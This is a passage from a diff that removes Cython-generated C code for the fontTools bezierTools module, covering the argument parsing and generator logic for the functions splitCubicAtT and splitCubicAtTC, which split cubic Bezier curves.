CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = 
__Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 613, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 613, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtT", 0, 4, 4, 1); __PYX_ERR(0, 613, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 613, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtT", 0, 4, 4, 2); __PYX_ERR(0, 613, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 613, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtT", 0, 4, 4, 3); __PYX_ERR(0, 613, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 4) ? 
kwd_pos_args : 4; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "splitCubicAtT") < 0)) __PYX_ERR(0, 613, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitCubicAtT", 0, 4, 4, __pyx_nargs); __PYX_ERR(0, 613, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_DECREF(__pyx_v_ts); __pyx_v_ts = 0; - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_32splitCubicAtT(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_32splitCubicAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_ts) { - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_b = NULL; - PyObject 
*__pyx_v_c = NULL; - PyObject *__pyx_v_d = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - PyObject *(*__pyx_t_8)(PyObject *); - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitCubicAtT", 1); - - /* "fontTools/misc/bezierTools.py":633 - * ((77.3438, 56.25), (85.9375, 43.75), (93.75, 25), (100, 0)) - * """ - * a, b, c, d = calcCubicParameters(pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * return _splitCubicAtT(a, b, c, d, *ts) - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcCubicParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 633, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 4+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 633, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 633, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && 
!CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_6 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - __pyx_t_6 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 633, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_5,&__pyx_t_6}; - __pyx_t_7 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 633, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_8(__pyx_t_7); if (unlikely(!item)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 4) < 0) __PYX_ERR(0, 633, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 633, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_a = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_b = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_c = __pyx_t_5; - __pyx_t_5 = 0; - __pyx_v_d = __pyx_t_6; - __pyx_t_6 = 0; - - 
/* "fontTools/misc/bezierTools.py":634 - * """ - * a, b, c, d = calcCubicParameters(pt1, pt2, pt3, pt4) - * return _splitCubicAtT(a, b, c, d, *ts) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_splitCubicAtT); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 634, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyTuple_New(4); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 634, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_INCREF(__pyx_v_a); - __Pyx_GIVEREF(__pyx_v_a); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_v_a)) __PYX_ERR(0, 634, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b); - __Pyx_GIVEREF(__pyx_v_b); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_v_b)) __PYX_ERR(0, 634, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c); - __Pyx_GIVEREF(__pyx_v_c); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 2, __pyx_v_c)) __PYX_ERR(0, 634, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_d); - __Pyx_GIVEREF(__pyx_v_d); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 3, __pyx_v_d)) __PYX_ERR(0, 634, __pyx_L1_error); - __pyx_t_5 = PyNumber_Add(__pyx_t_6, __pyx_v_ts); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 634, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_5, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 634, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":613 - * - * - * def splitCubicAtT(pt1, pt2, pt3, pt4, *ts): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at one or more values of t. 
- * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_b); - __Pyx_XDECREF(__pyx_v_c); - __Pyx_XDECREF(__pyx_v_d); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_36generator(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":637 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * pt1=cython.complex, - * pt2=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_35splitCubicAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_34splitCubicAtTC, "splitCubicAtTC(double complex pt1, double complex pt2, double complex pt3, double complex pt4, *ts)\nSplit a cubic Bezier curve at one or more values of t.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as complex numbers..\n *ts: Positions at which to split the curve.\n\n Yields:\n Curve segments (each curve segment being four complex numbers).\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_35splitCubicAtTC = {"splitCubicAtTC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_35splitCubicAtTC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_34splitCubicAtTC}; -static PyObject 
*__pyx_pw_9fontTools_4misc_11bezierTools_35splitCubicAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitCubicAtTC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 4, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - 
(void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 637, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 637, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtTC", 0, 4, 4, 1); __PYX_ERR(0, 637, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 637, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtTC", 0, 4, 4, 2); __PYX_ERR(0, 637, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 637, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicAtTC", 0, 4, 4, 3); __PYX_ERR(0, 637, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 4) ? 
kwd_pos_args : 4; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "splitCubicAtTC") < 0)) __PYX_ERR(0, 637, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 647, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 647, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 647, __pyx_L3_error) - __pyx_v_pt4 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 647, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitCubicAtTC", 0, 4, 4, __pyx_nargs); __PYX_ERR(0, 637, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_CLEAR(__pyx_v_ts); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_34splitCubicAtTC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); 
++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_34splitCubicAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, PyObject *__pyx_v_ts) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitCubicAtTC", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 637, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_v_pt1 = __pyx_v_pt1; - __pyx_cur_scope->__pyx_v_pt2 = __pyx_v_pt2; - __pyx_cur_scope->__pyx_v_pt3 = __pyx_v_pt3; - __pyx_cur_scope->__pyx_v_pt4 = __pyx_v_pt4; - __pyx_cur_scope->__pyx_v_ts = __pyx_v_ts; - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_ts); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_ts); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_36generator, __pyx_codeobj_, (PyObject *) __pyx_cur_scope, __pyx_n_s_splitCubicAtTC, __pyx_n_s_splitCubicAtTC, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 637, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return 
(PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_36generator(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *(*__pyx_t_7)(PyObject *); - __pyx_t_double_complex __pyx_t_8; - __pyx_t_double_complex __pyx_t_9; - __pyx_t_double_complex __pyx_t_10; - __pyx_t_double_complex __pyx_t_11; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitCubicAtTC", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - case 1: goto __pyx_L6_resume_from_yield_from; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 637, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":657 - * Curve segments (each curve segment being four complex numbers). 
- * """ - * a, b, c, d = calcCubicParametersC(pt1, pt2, pt3, pt4) # <<<<<<<<<<<<<< - * yield from _splitCubicAtTC(a, b, c, d, *ts) - * - */ - __pyx_t_1 = __pyx_f_9fontTools_4misc_11bezierTools_calcCubicParametersC(__pyx_cur_scope->__pyx_v_pt1, __pyx_cur_scope->__pyx_v_pt2, __pyx_cur_scope->__pyx_v_pt3, __pyx_cur_scope->__pyx_v_pt4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 4)) { - if (size > 4) __Pyx_RaiseTooManyValuesError(4); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 657, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_4 = PyTuple_GET_ITEM(sequence, 2); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 3); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_4 = PyList_GET_ITEM(sequence, 2); - __pyx_t_5 = PyList_GET_ITEM(sequence, 3); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_4); - __Pyx_INCREF(__pyx_t_5); - #else - { - Py_ssize_t i; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_4,&__pyx_t_5}; - for (i=0; i < 4; i++) { - PyObject* item = PySequence_ITEM(sequence, i); if (unlikely(!item)) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_GOTREF(item); - *(temps[i]) = item; - } - } - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - PyObject** temps[4] = {&__pyx_t_2,&__pyx_t_3,&__pyx_t_4,&__pyx_t_5}; - __pyx_t_6 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = 
